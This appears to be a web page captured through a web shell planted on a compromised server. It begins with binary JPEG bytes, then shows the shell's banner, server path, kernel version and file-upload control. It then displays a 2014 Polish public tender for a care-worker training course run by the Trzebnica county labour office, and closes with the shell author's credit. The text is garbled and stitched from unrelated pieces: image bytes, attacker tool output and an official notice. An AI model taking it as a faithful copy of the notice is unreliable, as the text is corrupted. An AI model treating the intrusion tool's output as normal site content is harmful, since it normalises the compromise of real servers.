JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140307/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140307/76836-N-2014.html

<p class="kh_header"><b>Trzebnica: Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku  OPIEKA NAD OSOBAMI STARSZYMI I DZIEĆMI Z NAUKĄ JĘZYKA NIEMIECKIEGO dla osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy.</b><br>
<b>Numer ogłoszenia: 76836 - 2014; data zamieszczenia: 07.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Trzebnicy , ul. Kościuszki 10, 55-100 Trzebnica, woj. dolnośląskie, tel. 71 312-11-54, 387-05-65, faks 71 312-11-54.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.praca.trzebnica.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie szkolenia w kierunku  OPIEKA NAD OSOBAMI STARSZYMI I DZIEĆMI Z NAUKĄ JĘZYKA NIEMIECKIEGO dla osób zarejestrowanych w Powiatowym Urzędzie Pracy w Trzebnicy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Planowane jest przeszkolenie do 10 osób. Zamawiający zakłada  przeprowadzenie szkolenia w okresie kwiecień - lipiec  br.  Planowane jest, by szkolenie rozpoczęło się około 15 kwietnia,  a zakończyło  najpóźniej do 31.07.2013r.  Szkolenie przeznaczone jest dla osób, które  posiadają wykształcenie min. podstawowe; zamierzają zdobyć lub uzupełnić wiadomości i umiejętności zawodowe lub dokonać zmiany zawodu. Szkolenie ma na celu zdobycie wiedzy teoretycznej oraz umiejętności  praktycznych niezbędnych do wykonywania pracy w charakterze opiekuna, jak również zdobycie wiedzy medycznej, psychologicznej i pedagogicznej na temat opieki nad osobami starszymi i dziećmi, a także nabycie umiejętności posługiwania się językiem niemieckim z uwzględnieniem języka branżowego na poziomie podstawowym. Dokładny opis przedmiotu zamówienia w zał.1 do SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert; oświadczenie o posiadaniu aktualnego wpisu do Rejestru Instytucji Szkoleniowych we właściwym Wojewódzkim Urzędzie Pracy zgodnie z Ustawą o promocji zatrudnienia 
i instytucjach rynku  pracy z dnia 20 kwietnia 2004 roku ( t.j. Dz.U. z 2013 roku, poz. 674 z późn. zm.) oraz  Rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie  rejestru instytucji  szkoleniowych (Dz. U. z 2004 roku, Nr 236 poz. 2365)  zgodnie ze wzorem będącym  Załącznikiem 10</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi wykaz wykonanych usług wraz z dowodami potwierdzającymi należyte wykonanie w okresie ostatnich trzech lat przed upływem terminu składania ofert a jeżeli okres działalności szkoleniowej jest krótszy - w tym okresie - usługi szkoleniowe odpowiadające przedmiotowi niniejszego amówienia, tj. co najmniej  3  szkolenia grupowe dla grup minimum 10-osobowych z zakresu opieki nad osobami starszymi i/lub dziećmi i/lub osobami chorymi w wymiarze nie krótszym niż 40 godzin przeznaczonych na tematykę z zakresu opieki, pomocy przemedycznej. W sytuacji, gdy Wykonawca wykaże się realizacją szkoleń składających się z kilku edycji - każda edycja traktowana będzie jako odrębne szkolenie.  Pojęcie edycji Zamawiający rozumie następująco: przeprowadzenie danego szkolenia jako jednego z cyklu regularnie odbywających się.
Do każdego wymienionego w Wykazie szkolenia Wykonawca zobowiązany jest dołączyć i oznaczyć numerem pozycji z wykazu dowody, czy zostały wykonane lub są wykonywane należycie (np. referencje).W przypadku, gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w Wykazie wykonywanych usług zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów. 
Wykonawca przygotuje wykaz wykonanych usług według wzoru, będącego Załącznikiem nr 5.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi opis miejsca szkolenia z oświadczeniem, że miejsce szkolenia jest dostosowane ilością i jakością pomieszczeń oraz wyposażone w sprzęt i pomoce dydaktyczne odpowiednio do potrzeb szkolenia, z uwzględnieniem bezpiecznych i higienicznych warunków pracy i nauki, a także że zapewnione jest każdemu uczestnikowi szkolenia miejsce do odbycia praktyki. Wykonawca zobowiązany jest zapewnić jasno oświetloną, przestronną salę szkoleniową, przystosowaną do przeprowadzenia zajęć  teoretycznych i praktycznych, dla grupy minimum 10- osobowej z odpowiednim sprzętem i wyposażeniem ( np. tablica, rzutnik, flipchart, fantom, wózek inwalidzki, balkonik, ciśnieniomierz, łóżko, opatrunki, zestaw do podawania leków, sprzęt do karmienia i pojenia, zestaw naczyń do zaspokajania potrzeb wydalania itp.). Sala dostosowana do liczby uczestników szkolenia musi zapewniać osobne miejsca do siedzenia dla każdego uczestnika umożliwiające swobodne sporządzanie notatek (stolik, ławka). Ponadto miejsce szkolenia musi zapewniać nieograniczony dostęp do pomieszczeń sanitarnych (w tym dostęp do toalety zaopatrzonej w środki higieny) oraz do zaplecza socjalnego. Wykonawca zobowiązany jest zapewnić wszystkim uczestnikom w każdym dniu szkolenia ciepłe napoje ( kawa, herbata )  oraz wodę mineralną i cukier. Ponadto Wykonawca musi zapewnić uczestnikom szkolenia miejsce do odbycia praktyk zgodne z przepisami bezpieczeństwa i higieny pracy oraz przepisami ochrony przeciwpożarowej, zapewniające swobodne wykonywanie ćwiczeń  praktycznych, z wyposażeniem bazy szkoleniowej umożliwiającej poznanie zakresu zadań i czynności wykonywanych na stanowisku opiekuna, ze swobodnym dostępem do narzędzi i sprzętu potrzebnych do nauki w celu wykonywania ćwiczeń praktycznych. W przypadku, gdy Wykonawca nie jest dysponentem potencjału technicznego Wykonawca zobowiązany jest podać informacje o podstawie jego dysponowania - według wzoru, będącego Załącznikiem nr 6.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ww. warunek, gdy przedstawi wykaz kadry dydaktycznej,  która będzie uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich, kwalifikacji zawodowych, wykształcenia, doświadczenia  niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nią czynności.  Wykaz kadry dydaktycznej musi składać się z minimum 3 osób, z których każda posiada oświadczenie w przeprowadzeniu co najmniej 3 szkoleń w zakresie przedmiotowym szkolenia, tj. odpowiednio - do przeprowadzenia szkolenia w zakresie opieki, zajęć aktywizujących, nauki języka niemieckiego. W przypadku  nauczycieli należy wskazać nazwy przedmiotów związanych z przedmiotem zamówienia, w których osoba posiada co najmniej roczny staż pracy dydaktycznej. Wykazując doświadczenie każdej osoby z kadry dydaktycznej w realizacji szkoleń Wykonawca zobowiązany jest wskazać: nazwy szkolenia ( zakres szkoleń ), terminy szkoleń i nazwę Zleceniodawcy dla którego były te szkolenia realizowane. Wykonawca przygotuje wykaz kadry dydaktycznej zgodnie  z Załącznikiem Nr 7. Najpóźniej przed  podpisaniem umowy Wykonawca zobowiązany będzie dostarczyć oświadczenia wykładowców o gotowości do przeprowadzenia zajęć na szkoleniu, będących przedmiotem zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie formułuje w powyższym zakresie warunku szczegółowego.Ocena spełnienia w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o informacje zawarte w złożonych oświadczeniach.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Formularz oferty - załącznik nr 4 do SIWZ  b)	Program szkolenia  - przygotowany przez Wykonawcę zgodnie z § 75 ust. 4 rozporządzenia Ministra Pracy i Polityki Społecznej z dnia 14 września 2010r. w sprawie standardów i warunków prowadzenia usług rynku pracy (Dz. U. Nr 177 poz. 1193 z późn. zm.)  - Załącznik  nr 8 do SIWZ.  c)	Preliminarz kosztów szkolenia - załącznik nr 9 do SIWZ. d)	pełnomocnictwo - w przypadku gdy Wykonawcę reprezentuje pełnomocnik.  Wykonawca dostarczy pełnomocnictwo podpisane przez osoby reprezentujące Wykonawcę i określające zakres tego pełnomocnictwa  w formie oryginału lub w postaci kopii poświadczonej notarialnie. e)	certyfikaty jakości usług potwierdzające  wysoki standard świadczonych usług szkoleniowych jeśli Wykonawca posiada ( akredytacja kuratora oświaty, certyfikat systemu zarządzania jakością kształcenia/szkolenia wydany na podstawie międzynarodowych norm ISO, itp.) 
f)	oświadczenie wykonawcy, że posiada aktualny program szkolenia dla wolontariusza przygotowany zgodnie Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 25 marca 2011 r. w sprawie zakresu programów szkoleń dla opiekuna w żłobku lub klubie dziecięcym, wolontariusza oraz dziennego opiekuna, zatwierdzony przez Ministra Pracy i Polityki Społecznej.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie wykonawcy - 30</li>
<li>3 - Posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający informuje, iż zgodnie z wymogami art. 36 ust. 1 pkt. 16 ustawy Prawo zamówień publicznych postanowienia zawarte we wzorze umowy stanowiącym Załącznik nr 11 do niniejszej specyfikacji będą wprowadzone do treści zawieranej umowy w sprawie udzielenia zamówienia publicznego. 2.	Dopuszczalna jest zmiana umowy dotycząca: ilości osób skierowanych na szkolenie, 	terminu realizacji szkolenia, 	miejsca realizacji szkolenia, 	kadry dydaktycznej, podwykonawcy w sytuacjach, gdy zmiana taka wynika z przyczyn niezależnych, których nie można było przewidzieć w chwili podpisania umowy np. choroby, pobytu w stacjonarnym zakładzie opieki zdrowotnej, potwierdzonego odpowiednim zaświadczeniem lekarskim na druku ZUS ZLA, zdarzenia losowe, awarie, wypowiedzenie umowy najmu (dzierżawa) sal wykładowych, wypowiedzenie umów dot. świadczenia pracy przez wykładowców, zaistnienia okoliczności niezależnych od Zamawiającego uniemożliwiających rozpoczęcie szkolenia przez maksymalną liczbę osób na skutek nieprzewidzianych okoliczności m.in.: zwolnienia lekarskiego, nie zgłoszenia się po skierowanie, podjęcia pracy przez bezrobotnego w sytuacji, gdy nie ma możliwości skierowania kolejnej osoby. 

3.	Wykonawca jest zobowiązany niezwłocznie zawiadomić pisemnie Zamawiającego o zaistniałej sytuacji i przedstawić propozycję dokonania zmiany. 
4.	W przypadku prośby o zmianę wykładowcy lub instruktora Wykonawca zobowiązany jest przedstawić zastępstwo tej osoby przez osobę o kwalifikacjach zawodowych i doświadczeniu co najmniej równych co osoba zastępowana. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony Załącznik nr 7 do specyfikacji istotnych warunków zamówienia. 
5.	W przypadku zmiany miejsca szkolenia Wykonawca zobowiązany jest zapewnić warunku lokalowe co najmniej równoważne do poprzednich. Ponadto Wykonawca będzie zobowiązany przedstawić Zamawiającemu wraz z wnioskiem wypełniony Załącznik nr 6 do specyfikacji istotnych warunków zamówienia. 
6.	W przypadku, gdy Wykonawca zechce zmienić lub zrezygnować w trakcje realizacji zamówienia z podwykonawcy, na zasoby którego powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia. 
7.	Wszelkie zmiany mogą nastąpić wyłącznie wtedy, gdy Zamawiający wyrazi na nie zgodę. 
8.	Żadna ze zmian nie może wpłynąć na zmianę ceny szkolenia w przeliczeniu na 1 uczestnika
9.	Zamawiający może żądać od Wykonawcy zmiany osób przewidzianych do realizacji szkolenia, jeżeli uzna, że osoby te nienależycie wykonują swoje obowiązki. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany osób realizujących zamówienie i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe osoby spełniające wymogi Zamawiającego. Osoby zastępowane muszą spełniać co najmniej warunki określone dla kadry szkoleniowej w niniejszym zamówieniu. 

10.	Zamawiający może żądać od Wykonawcy zmiany miejsca szkolenia, jeżeli uzna, że miejsce nie odpowiada wymaganiom szkolenia. W takiej sytuacji Zamawiający pisemnie przedstawi powody, dla których żąda zmiany i wskaże termin, w jakim Wykonawca zobowiązany będzie wskazać nowe miejsce spełniające wymogi Zamawiającego. Miejsce szkolenia musi spełniać co najmniej warunki określone dla miejsca szkolenia w niniejszym zamówieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.praca.trzebnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy ul. Kościuszki 10, 55-100 Trzebnica.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2014 godzina 09:00, miejsce: Powiatowy Urząd Pracy ul. Kościuszki 10, 55-100 Trzebnica, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie będzie współfinansowane ze środków Europejskiego Funduszu Społecznego w ramach projektu systemowego PO KAPITAŁ realizowanego w ramach Priorytetu VI PO KL: Rynek pracy otwarty dla wszystkich, Działanie 6.1: Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie, Poddziałanie 6.1.3: Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com